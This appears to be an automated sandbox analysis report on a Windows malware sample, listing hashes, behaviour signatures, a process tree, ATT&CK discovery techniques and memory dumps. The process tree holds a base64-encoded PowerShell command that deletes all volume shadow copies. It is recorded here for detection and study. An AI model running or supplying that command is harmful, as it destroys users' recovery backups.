Analysis

  • max time kernel
    136s
  • max time network
    131s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 02:13

General

  • Target

    3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe

  • Size

    168KB

  • MD5

    4055b029169ab30c5408bd0ab527a8ae

  • SHA1

    a410032d78bbc13f8b32ed0f38f6208081518bc6

  • SHA256

    3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac

  • SHA512

    dfb91472802e5b27c37861e3ebfc88a4b078dd2f123e06bd3541c53631fbded949fb3a3f8953341d8cffcf9ee0d1b02013a7ea2b02a7dd755ab57b91ab87caec

Score
6/10

Malware Config

Signatures

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Windows directory 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
    "C:\Users\Admin\AppData\Local\Temp\3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe"
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1088
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:584
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1668
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1300

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/584-55-0x000007FEFC321000-0x000007FEFC323000-memory.dmp
      Filesize

      8KB

    • memory/584-57-0x00000000025F0000-0x00000000025F2000-memory.dmp
      Filesize

      8KB

    • memory/584-58-0x00000000025F2000-0x00000000025F4000-memory.dmp
      Filesize

      8KB

    • memory/584-59-0x00000000025F4000-0x00000000025F7000-memory.dmp
      Filesize

      12KB

    • memory/584-56-0x000007FEF35B0000-0x000007FEF410D000-memory.dmp
      Filesize

      11.4MB

    • memory/584-60-0x00000000025FB000-0x000000000261A000-memory.dmp
      Filesize

      124KB

    • memory/1088-54-0x0000000076C61000-0x0000000076C63000-memory.dmp
      Filesize

      8KB